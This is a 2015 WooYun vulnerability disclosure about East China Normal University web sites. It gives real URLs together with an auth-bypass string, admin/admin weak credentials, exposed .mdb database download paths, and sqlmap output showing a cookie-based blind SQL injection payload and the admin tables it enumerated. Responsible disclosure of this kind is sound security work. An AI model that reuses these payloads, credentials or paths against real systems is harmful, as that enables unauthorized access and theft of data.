当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162788

漏洞标题:华东师范大学多站合集(未授权访问+注入+数据库下载+弱口令+万能密码)

相关厂商:华东师范大学

漏洞作者: j0k3r

提交时间:2015-12-20 22:53

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-20: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

很多很多…

详细说明:

0x1:未授权访问,直接进后台
http://kpi.ecnu.edu.cn/web.aspx

1.png


2.png


0x2:万能密码 'or'='or'
http://fzgh.ecnu.edu.cn/admin/login.aspx

5.png


0x3:弱口令 admin/admin
url-1:http://ggkf.ecnu.edu.cn/admin/adminlogin.aspx

6.png


url-2:http://www.dljx.ecnu.edu.cn/Manage/default.php

10.png


0x4:数据库下载
url-1:http://teacherforum.ecnu.edu.cn/admin/editor/db/ewebeditor.mdb

4.png


url-2:http://www.cc.ecnu.edu.cn/Data/data.mdb
后台:http://www.cc.ecnu.edu.cn/Admin_Login.asp

9.png


0x5:注入
http://www.bstest.ecnu.edu.cn/teacher_kk.asp?id=396

7.png


8.png


Database: Microsoft_Access_masterdb
Table: admin
[11 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| key        | non-numeric |
| content    | non-numeric |
| email      | non-numeric |
| id         | numeric     |
| password   | non-numeric |
| price      | numeric     |
| product_id | numeric     |
| qq         | non-numeric |
| title      | non-numeric |
| unit       | non-numeric |
| username   | non-numeric |
+------------+-------------+


0x6:数据库下载+cookie注入
http://www.edp.ecnu.edu.cn/Data/db.mdb
http://www.edp.ecnu.edu.cn/onews.asp?id=276

sqlmap identified the following injection point(s) with a total of 127 HTTP(s) r
equests:
---
Parameter: id (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 2980=2980
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[2 tables]
+-------+
| admin |
| news  |
+-------+
Database: Microsoft_Access_masterdb
Table: admin
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| user     | non-numeric |
| admin    | non-numeric |
| content  | non-numeric |
| id       | numeric     |
| password | non-numeric |
| title    | non-numeric |
+----------+-------------+

漏洞证明:

1.png


5.png


6.png


7.png


9.png


10.png

修复方案:

..

版权声明:转载请注明来源 j0k3r@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-21 15:20

厂商回复:

通知二级单位处理。

最新状态:

暂无